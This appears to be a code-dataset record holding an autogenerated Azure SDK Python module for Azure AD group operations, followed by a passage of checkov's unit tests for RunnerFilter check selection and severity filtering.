e1ae12d2fd816c19fcba586ad1882fa982061343 | 26,579 | py | Python | azure-graphrbac/azure/graphrbac/operations/groups_operations.py | CharaD7/azure-sdk-for-python | 9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c | [
"MIT"
] | null | null | null | azure-graphrbac/azure/graphrbac/operations/groups_operations.py | CharaD7/azure-sdk-for-python | 9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c | [
"MIT"
] | null | null | null | azure-graphrbac/azure/graphrbac/operations/groups_operations.py | CharaD7/azure-sdk-for-python | 9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
import uuid
from .. import models
class GroupsOperations(object):
"""GroupsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
:ivar api_version: Client Api Version. Constant value: "1.6".
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "1.6"
self.config = config
def is_member_of(
self, group_id, member_id, custom_headers=None, raw=False, **operation_config):
"""Checks whether the specified user, group, contact, or service
principal is a direct or a transitive member of the specified group.
:param group_id: The object ID of the group to check.
:type group_id: str
:param member_id: The object ID of the contact, group, user, or
service principal to check for membership in the specified group.
:type member_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`CheckGroupMembershipResult
<azure.graphrbac.models.CheckGroupMembershipResult>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
parameters = models.CheckGroupMembershipParameters(group_id=group_id, member_id=member_id)
# Construct URL
url = '/{tenantID}/isMemberOf'
path_format_arguments = {
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'CheckGroupMembershipParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.GraphErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CheckGroupMembershipResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def remove_member(
self, group_object_id, member_object_id, custom_headers=None, raw=False, **operation_config):
"""Remove a memeber from a group. Reference:
https://msdn.microsoft.com/en-us/library/azure/ad/graph/api/groups-operations#DeleteGroupMember.
:param group_object_id: Group object id
:type group_object_id: str
:param member_object_id: Member Object id
:type member_object_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/{tenantID}/groups/{groupObjectId}/$links/members/{memberObjectId}'
path_format_arguments = {
'groupObjectId': self._serialize.url("group_object_id", group_object_id, 'str', skip_quote=True),
'memberObjectId': self._serialize.url("member_object_id", member_object_id, 'str', skip_quote=True),
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [204]:
raise models.GraphErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def add_member(
self, group_object_id, url, custom_headers=None, raw=False, **operation_config):
"""Add a memeber to a group. Reference:
https://msdn.microsoft.com/en-us/library/azure/ad/graph/api/groups-operations#AddGroupMembers.
:param group_object_id: Group object id
:type group_object_id: str
:param url: Member Object Url as
"https://graph.windows.net/0b1f9851-1bf0-433f-aec3-cb9272f093dc/directoryObjects/f260bbc4-c254-447b-94cf-293b5ec434dd",
where "0b1f9851-1bf0-433f-aec3-cb9272f093dc" is the tenantId and
"f260bbc4-c254-447b-94cf-293b5ec434dd" is the objectId of the member
(user, application, servicePrincipal, group) to be added.
:type url: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
parameters = models.GroupAddMemberParameters(url=url)
# Construct URL
url = '/{tenantID}/groups/{groupObjectId}/$links/members'
path_format_arguments = {
'groupObjectId': self._serialize.url("group_object_id", group_object_id, 'str', skip_quote=True),
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'GroupAddMemberParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [204]:
raise models.GraphErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, group_object_id, custom_headers=None, raw=False, **operation_config):
"""Delete a group in the directory. Reference:
http://msdn.microsoft.com/en-us/library/azure/dn151676.aspx.
:param group_object_id: Object id
:type group_object_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: None
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/{tenantID}/groups/{groupObjectId}'
path_format_arguments = {
'groupObjectId': self._serialize.url("group_object_id", group_object_id, 'str', skip_quote=True),
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [204]:
raise models.GraphErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def create(
self, display_name, mail_nickname, custom_headers=None, raw=False, **operation_config):
"""Create a group in the directory. Reference:
http://msdn.microsoft.com/en-us/library/azure/dn151676.aspx.
:param display_name: Group display name
:type display_name: str
:param mail_nickname: Mail nick name
:type mail_nickname: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ADGroup <azure.graphrbac.models.ADGroup>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
parameters = models.GroupCreateParameters(display_name=display_name, mail_nickname=mail_nickname)
# Construct URL
url = '/{tenantID}/groups'
path_format_arguments = {
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'GroupCreateParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [201]:
raise models.GraphErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 201:
deserialized = self._deserialize('ADGroup', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def list(
self, filter=None, custom_headers=None, raw=False, **operation_config):
"""Gets list of groups for the current tenant.
:param filter: The filter to apply on the operation.
:type filter: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ADGroupPaged <azure.graphrbac.models.ADGroupPaged>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/{tenantID}/groups'
path_format_arguments = {
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = '/{tenantID}/{nextLink}'
path_format_arguments = {
'nextLink': self._serialize.url("next_link", next_link, 'str', skip_quote=True),
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.GraphErrorException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.ADGroupPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.ADGroupPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def get_group_members(
self, object_id, custom_headers=None, raw=False, **operation_config):
"""Gets the members of a group.
:param object_id: Group object Id who's members should be retrieved.
:type object_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`AADObjectPaged
<azure.graphrbac.models.AADObjectPaged>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/{tenantID}/groups/{objectId}/members'
path_format_arguments = {
'objectId': self._serialize.url("object_id", object_id, 'str', skip_quote=True),
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = '/{tenantID}/{nextLink}'
path_format_arguments = {
'nextLink': self._serialize.url("next_link", next_link, 'str', skip_quote=True),
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.GraphErrorException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.AADObjectPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.AADObjectPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def get(
self, object_id, custom_headers=None, raw=False, **operation_config):
"""Gets group information from the directory.
:param object_id: User objectId to get group information.
:type object_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ADGroup <azure.graphrbac.models.ADGroup>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/{tenantID}/groups/{objectId}'
path_format_arguments = {
'objectId': self._serialize.url("object_id", object_id, 'str', skip_quote=True),
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
raise models.GraphErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ADGroup', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_member_groups(
self, object_id, security_enabled_only, custom_headers=None, raw=False, **operation_config):
"""Gets a collection that contains the Object IDs of the groups of which
the group is a member.
:param object_id: Group filtering parameters.
:type object_id: str
:param security_enabled_only: If true only membership in security
enabled groups should be checked. Otherwise membership in all groups
should be checked
:type security_enabled_only: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`strPaged <azure.graphrbac.models.strPaged>`
"""
parameters = models.GroupGetMemberGroupsParameters(security_enabled_only=security_enabled_only)
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/{tenantID}/groups/{objectId}/getMemberGroups'
path_format_arguments = {
'objectId': self._serialize.url("object_id", object_id, 'str', skip_quote=True),
'tenantID': self._serialize.url("self.config.tenant_id", self.config.tenant_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'GroupGetMemberGroupsParameters')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
raise models.GraphErrorException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.strPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.strPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
| 44.972927 | 144 | 0.650175 | 2,872 | 26,579 | 5.812326 | 0.081825 | 0.035344 | 0.025879 | 0.038819 | 0.839154 | 0.825915 | 0.820404 | 0.811538 | 0.798598 | 0.792847 | 0 | 0.007381 | 0.250724 | 26,579 | 590 | 145 | 45.049153 | 0.830831 | 0.266225 | 0 | 0.783333 | 0 | 0 | 0.131582 | 0.061285 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043333 | false | 0 | 0.01 | 0 | 0.116667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bed198b1b4257fbc0b9ac94f2c5fad2b2a77e9ec | 18,663 | py | Python | tests/common/test_runner_filter.py | Kostavro/checkov | 55c5c6144683b251d7e8d2c11955f29f6a11183d | [
"Apache-2.0"
] | null | null | null | tests/common/test_runner_filter.py | Kostavro/checkov | 55c5c6144683b251d7e8d2c11955f29f6a11183d | [
"Apache-2.0"
] | null | null | null | tests/common/test_runner_filter.py | Kostavro/checkov | 55c5c6144683b251d7e8d2c11955f29f6a11183d | [
"Apache-2.0"
] | null | null | null | import unittest
from checkov.common.bridgecrew.severities import Severities, BcSeverities
from checkov.common.checks.base_check import BaseCheck
from checkov.runner_filter import RunnerFilter
class TestRunnerFilter(unittest.TestCase):
# Expected pseudo-code for when checks should run:
# if has_check_flag_specified():
# checks_to_run = checks_specifically_included
# else:
# checks_to_run = all_built_in_checks
# if has_checks_dir_specified():
# checks_to_run += checks_from_external_dir
# for skipped_check in skip_check_flags():
# checks_to_run.remove(skipped_check)
def test_should_run_default(self):
instance = RunnerFilter()
self.assertTrue(instance.should_run_check(check_id="CHECK_1"))
def test_should_run_specific_enable(self):
instance = RunnerFilter(checks=["CHECK_1"])
self.assertTrue(instance.should_run_check(check_id="CHECK_1"))
def test_should_run_specific_enable_bc(self):
instance = RunnerFilter(checks=["BC_CHECK_1"])
self.assertTrue(instance.should_run_check(check_id="CHECK_1", bc_check_id="BC_CHECK_1"))
def test_should_run_wildcard_enable(self):
instance = RunnerFilter(checks=["CHECK_*"])
self.assertTrue(instance.should_run_check(check_id="CHECK_1"))
def test_should_run_wildcard_enable_bc(self):
instance = RunnerFilter(checks=["BC_CHECK_*"])
self.assertTrue(instance.should_run_check(check_id="CHECK_1", bc_check_id="BC_CHECK_1"))
def test_should_run_omitted_specific_enable(self):
instance = RunnerFilter(checks=["CHECK_1"])
self.assertFalse(instance.should_run_check(check_id="CHECK_999"))
def test_should_run_omitted_specific_enable_bc_id(self):
instance = RunnerFilter(checks=["BC_CHECK_1"])
self.assertFalse(instance.should_run_check(check_id="CHECK_999", bc_check_id="BC_CHECK_999"))
def test_should_run_specific_disable(self):
instance = RunnerFilter(skip_checks=["CHECK_1"])
self.assertFalse(instance.should_run_check(check_id="CHECK_1"))
def test_should_run_specific_disable_bc_id(self):
instance = RunnerFilter(skip_checks=["BC_CHECK_1"])
self.assertFalse(instance.should_run_check(check_id="CHECK_1", bc_check_id="BC_CHECK_1"))
def test_should_run_omitted_specific_disable(self):
instance = RunnerFilter(skip_checks=["CHECK_1"])
self.assertTrue(instance.should_run_check(check_id="CHECK_999"))
def test_should_run_omitted_specific_disable_bc_id(self):
instance = RunnerFilter(skip_checks=["BC_CHECK_1"])
self.assertTrue(instance.should_run_check(check_id="CHECK_999", bc_check_id="BC_CHECK_999"))
def test_should_run_external(self):
instance = RunnerFilter(skip_checks=["CHECK_1"])
instance.notify_external_check("EXT_CHECK_999")
self.assertTrue(instance.should_run_check(check_id="EXT_CHECK_999"))
def test_should_run_external2(self):
instance = RunnerFilter(checks=["CHECK_1"], skip_checks=["CHECK_2"])
instance.notify_external_check("EXT_CHECK_999")
self.assertFalse(instance.should_run_check(check_id="EXT_CHECK_999"))
def test_should_run_external3(self):
instance = RunnerFilter(checks=["EXT_CHECK_999"])
instance.notify_external_check("EXT_CHECK_999")
self.assertTrue(instance.should_run_check(check_id="EXT_CHECK_999"))
def test_should_run_external4(self):
instance = RunnerFilter(checks=["CHECK_1"], skip_checks=["CHECK_2"], all_external=True)
instance.notify_external_check("EXT_CHECK_999")
self.assertTrue(instance.should_run_check(check_id="EXT_CHECK_999"))
def test_should_run_external_severity(self):
instance = RunnerFilter(checks=["CHECK_1"], skip_checks=["CHECK_2", "HIGH"], all_external=True)
instance.notify_external_check("EXT_CHECK_999")
self.assertFalse(instance.should_run_check(check_id="EXT_CHECK_999", severity=Severities[BcSeverities.HIGH]))
def test_should_run_external_disabled(self):
instance = RunnerFilter(skip_checks=["CHECK_1", "EXT_CHECK_999"])
instance.notify_external_check("EXT_CHECK_999")
self.assertFalse(instance.should_run_check(check_id="EXT_CHECK_999"))
def test_should_run_external_disabled2(self):
instance = RunnerFilter(skip_checks=["CHECK_1", "EXT_CHECK_999"], all_external=True)
instance.notify_external_check("EXT_CHECK_999")
self.assertFalse(instance.should_run_check(check_id="EXT_CHECK_999"))
def test_should_run_specific_disable_AND_enable(self):
instance = RunnerFilter(checks=["CHECK_1"], skip_checks=["CHECK_1"])
# prioritze disable - also this is not valid input and would be blocked in main.py
self.assertFalse(instance.should_run_check(check_id="CHECK_1"))
def test_should_run_omitted_wildcard(self):
instance = RunnerFilter(skip_checks=["CHECK_AWS*"])
self.assertTrue(instance.should_run_check(check_id="CHECK_999"))
def test_should_run_omitted_wildcard_bc_id(self):
instance = RunnerFilter(skip_checks=["BC_CHECK_AWS*"])
self.assertTrue(instance.should_run_check(check_id="CHECK_999", bc_check_id="BC_CHECK_999"))
def test_should_run_omitted_wildcard2(self):
instance = RunnerFilter(skip_checks=["CHECK_AWS*"])
self.assertFalse(instance.should_run_check(check_id="CHECK_AWS_909"))
def test_should_run_omitted_wildcard2_bc_id(self):
instance = RunnerFilter(skip_checks=["BC_CHECK_AWS*"])
self.assertFalse(instance.should_run_check(check_id="CHECK_AWS_909", bc_check_id="BC_CHECK_AWS_909"))
def test_should_run_omitted_wildcard3(self):
instance = RunnerFilter(skip_checks=["CHECK_AWS*","CHECK_AZURE*"])
self.assertTrue(instance.should_run_check(check_id="EXT_CHECK_909"))
def test_should_run_omitted_wildcard4(self):
instance = RunnerFilter(skip_checks=["CHECK_AWS*","CHECK_AZURE_01"])
self.assertFalse(instance.should_run_check(check_id="CHECK_AZURE_01"))
def test_should_run_severity1(self):
instance = RunnerFilter(checks=["LOW"])
self.assertTrue(instance.should_run_check(check_id='', severity=Severities[BcSeverities.LOW]))
def test_should_run_severity2(self):
instance = RunnerFilter(skip_checks=["LOW"])
self.assertTrue(instance.should_run_check(check_id='', severity=Severities[BcSeverities.HIGH]))
def test_should_skip_severity1(self):
instance = RunnerFilter(checks=["HIGH"])
self.assertFalse(instance.should_run_check(check_id='', severity=Severities[BcSeverities.LOW]))
def test_should_skip_severity2(self):
instance = RunnerFilter(skip_checks=["LOW"])
self.assertFalse(instance.should_run_check(check_id='', severity=Severities[BcSeverities.LOW]))
def test_should_run_check_id(self):
instance = RunnerFilter(checks=['CKV_AWS_45'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
self.assertTrue(instance.should_run_check(check=check))
def test_should_run_check_id_omitted(self):
instance = RunnerFilter(checks=['CKV_AWS_99'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
self.assertFalse(instance.should_run_check(check=check))
def test_should_run_check_bc_id(self):
instance = RunnerFilter(checks=['BC_AWS_45'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.bc_id = 'BC_AWS_45'
self.assertTrue(instance.should_run_check(check=check))
def test_should_run_check_bc_id_omitted(self):
instance = RunnerFilter(checks=['BC_AWS_99'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.bc_id = 'BC_AWS_45'
self.assertFalse(instance.should_run_check(check=check))
def test_should_skip_check_id(self):
instance = RunnerFilter(skip_checks=['CKV_AWS_45'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
self.assertFalse(instance.should_run_check(check=check))
def test_should_skip_check_id_omitted(self):
instance = RunnerFilter(skip_checks=['CKV_AWS_99'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
self.assertTrue(instance.should_run_check(check=check))
def test_should_skip_check_bc_id(self):
instance = RunnerFilter(skip_checks=['BC_AWS_45'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.bc_id = 'BC_AWS_45'
self.assertFalse(instance.should_run_check(check=check))
def test_should_skip_check_bc_id_omitted(self):
instance = RunnerFilter(skip_checks=['BC_AWS_99'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.bc_id = 'BC_AWS_45'
self.assertTrue(instance.should_run_check(check=check))
def test_should_run_check_severity(self):
instance = RunnerFilter(checks=['LOW'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.severity = Severities[BcSeverities.LOW]
self.assertTrue(instance.should_run_check(check=check))
def test_should_run_check_severity_omitted(self):
instance = RunnerFilter(checks=['HIGH'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.severity = Severities[BcSeverities.LOW]
self.assertFalse(instance.should_run_check(check=check))
def test_should_run_check_severity_implicit(self):
instance = RunnerFilter(checks=['LOW'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.severity = Severities[BcSeverities.HIGH]
self.assertTrue(instance.should_run_check(check=check))
def test_should_skip_check_severity(self):
instance = RunnerFilter(skip_checks=['LOW'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.severity = Severities[BcSeverities.LOW]
self.assertFalse(instance.should_run_check(check=check))
def test_should_skip_check_severity_implicit(self):
instance = RunnerFilter(skip_checks=['HIGH'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.severity = Severities[BcSeverities.LOW]
self.assertFalse(instance.should_run_check(check=check))
def test_should_skip_check_severity_threshold_exceeded(self):
instance = RunnerFilter(skip_checks=['LOW'])
from checkov.terraform.checks.resource.aws.LambdaEnvironmentCredentials import check
check.severity = Severities[BcSeverities.HIGH]
self.assertTrue(instance.should_run_check(check=check))
def test_check_severity_split_no_sev(self):
instance = RunnerFilter(checks=['XYZ'])
self.assertIsNone(instance.check_threshold)
self.assertEqual(instance.checks, ['XYZ'])
def test_check_severity_split_skip_no_sev(self):
instance = RunnerFilter(skip_checks=['XYZ'])
self.assertIsNone(instance.skip_check_threshold)
self.assertEqual(instance.skip_checks, ['XYZ'])
def test_check_severity_split_one_sev(self):
instance = RunnerFilter(checks=['MEDIUM'])
self.assertEqual(instance.check_threshold, Severities[BcSeverities.MEDIUM])
self.assertEqual(instance.checks, [])
def test_check_severity_split_two_sev(self):
instance = RunnerFilter(checks=['MEDIUM', 'LOW'])
# should take the lowest severity
self.assertEqual(instance.check_threshold, Severities[BcSeverities.LOW])
self.assertEqual(instance.checks, [])
def test_check_severity_split_skip_one_sev(self):
instance = RunnerFilter(skip_checks=['MEDIUM'])
self.assertEqual(instance.skip_check_threshold, Severities[BcSeverities.MEDIUM])
self.assertEqual(instance.skip_checks, [])
def test_check_severity_split_skip_two_sev(self):
instance = RunnerFilter(skip_checks=['LOW', 'MEDIUM'])
# should take the highest severity
self.assertEqual(instance.skip_check_threshold, Severities[BcSeverities.MEDIUM])
self.assertEqual(instance.skip_checks, [])
def test_run_sev_id_1(self):
instance = RunnerFilter(checks=['HIGH'], skip_checks=['CKV_AWS_123'])
# run all high and above, but skip this one ID regardless of severity
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.HIGH]))
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.CRITICAL]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.LOW]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.HIGH]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.CRITICAL]))
def test_run_sev_no_check_sev(self):
instance = RunnerFilter(checks=['HIGH'])
# if a check severity is used, skip any check without it
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789'))
def test_run_sev_no_check_sev_with_id(self):
instance = RunnerFilter(checks=['HIGH', 'CKV_AWS_789'])
# if a check severity is used, skip any check without it
